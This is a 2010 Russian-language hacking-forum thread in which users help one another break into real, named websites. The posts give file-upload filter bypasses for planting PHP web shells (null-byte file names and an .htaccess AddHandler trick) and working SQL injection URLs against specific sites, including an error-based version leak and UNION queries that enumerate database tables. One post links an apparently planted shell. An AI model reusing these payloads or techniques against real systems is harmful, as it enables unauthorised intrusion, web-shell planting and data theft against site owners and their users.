Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    754
    Likes Received:
    649
    Reputations:
    251
    .php5 попробуй залить
     
  2. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    265
    Likes Received:
    227
    Reputations:
    386
    не прокатило...там допустимо только JPG, GIF, PNG
     
  3. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    265
    Likes Received:
    227
    Reputations:
    386
    тоже нет...
    может я бред говорю но нельзя ли сделать что-то вроде этого
    т.е. к картинке приписать захексенный вредоносный код. не прокатит ?
     
  4. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    266
    Likes Received:
    150
    Reputations:
    28
    а .htaccess можно залить?
     
    1 person likes this.
  5. Mr.Replica

    Mr.Replica Member

    Joined:
    18 May 2010
    Messages:
    161
    Likes Received:
    40
    Reputations:
    10
    можно
     
    2 people like this.
  6. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    265
    Likes Received:
    227
    Reputations:
    386
    а если shell.php%00.gif то обработается корректно или нет ?
     
  7. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    266
    Likes Received:
    150
    Reputations:
    28
    так попробуй загрузить .htaccess и в нем прописать "AddHandler x-httpd-php .gif"
     
  8. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    Наткнулся на сайт __http://www.kvartal.ru, побродил по ссылкам и сразу нашел ошибку скрипта при подстановки в параметр кавычки:
    __http://www.kvartal.ru/index.php?id=21%27
    По всему похоже, что может получиться стандартная скуль, но пока не получается: пробовал вот как
    1) http://www.kvartal.ru/index.php?id=21+and+1=1
    2) http://www.kvartal.ru/index.php?id=21+and+1=2
    вывод одинаковый, подстановка коментов тоже не помогла, ну и как и следовало ожидать подбор столбцов через order by тоже ни к чему не привел. Походу это ошибка скрипта, но не скуль.
    Есть предположения в чем проблема?
     
    #11568 mr.celt, 27 Feb 2010
    Last edited: 27 Feb 2010
  9. Train

    Train Member

    Joined:
    9 Jan 2009
    Messages:
    26
    Likes Received:
    10
    Reputations:
    4
    Банальная строковая иньекция
    Админка:
     
    #11569 Train, 27 Feb 2010
    Last edited: 27 Feb 2010
    2 people like this.
  10. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    Все понял, спасибо. Ошибка была в том, что у параметра кавычку убирал и условия ставил.
     
    #11570 mr.celt, 27 Feb 2010
    Last edited: 28 Feb 2010
  11. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    265
    Likes Received:
    227
    Reputations:
    386
    хм...когда я заливаю шелл через админку, и потом прохожу по его урлу почему-то отображается сам код пхп-шелла, т.е он сам не выполняется...в чем причина ?
     
  12. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    476
    Likes Received:
    310
    Reputations:
    163
    .htaccess мб
     
  13. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    318
    Likes Received:
    46
    Reputations:
    6
    Если прикручен модуль mod_include
    попробуй загрузить shell.txt с данными:
     
  14. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    476
    Likes Received:
    310
    Reputations:
    163
    Слепая

    _http://www.parperfecto.com/able/events_view.php?eid=10/**/and/**/(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)

    Code:
    Duplicate column name '[COLOR=Red]5.0.77[/COLOR]'
     
  15. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    198
    Likes Received:
    669
    Reputations:
    329
    i добавь к имени базы и появится)
    проще наверно так)
    http://www.parperfecto.com/yaneshell.php
     
    1 person likes this.
  16. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    вот например здесь..
    http://www.unialco.com.br/jobs/details.php?id=-48'+union+select+1,2,GROUP_CONCAT(TABLE_NAME),4,5,6,7,8,9,10+FROM+information_schema.tables+WHERE+ASCII(LOWER(TABLE_NAME))=117+--+

    здесь запрос зделано так чтоби показано таблици ц начунаюших с букви у..

    а как вот здесь WHERE+ASCII(LOWER(TABLE_NAME))=117 напистаь полное имя таблици ??
     
  17. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,709
    Likes Received:
    405
    Reputations:
    196

    http://www.unialco.com.br/jobs/details.php?id=-48'+union+select+1,2,GROUP_CONCAT(TABLE_NAME),4,5, 6,7,8,9,10+FROM+information_schema.tables+WHERE+table_name='your_table'--
     
  18. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    482
    Likes Received:
    190
    Reputations:
    221
    Помоему смысла в этом запросе никакого нету, ибо получаем имя таблицы где имя таблицы равно имени таблицы)
    Ну и вопрос тоже какой то непонятный.
    Получать таблицы с именем начинающемся с U лучше так:
    Code:
    http://www.unialco.com.br/jobs/details.php?id=-48%27+union+select+1,2,GROUP_CONCAT(TABLE_NAME),4,5,%206,7,8,9,10+FROM+information_schema.tables+where+table_name>0x55+--+
    
     
    #11578 Seravin, 28 Feb 2010
    Last edited: 28 Feb 2010
    1 person likes this.
  19. LokbatanLi

    LokbatanLi Member

    Joined:
    24 Aug 2009
    Messages:
    170
    Likes Received:
    20
    Reputations:
    -10
    а вот именно where+table_name>x55+--+ здесь как написать >полнуй имя таблици ??
     
  20. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    754
    Likes Received:
    649
    Reputations:
    251
    Ога, PHP невыполняеться, а ASP.NET на Apache сервере с расширением .txt выполниться..
     
Loading...
Thread Status:
Not open for further replies.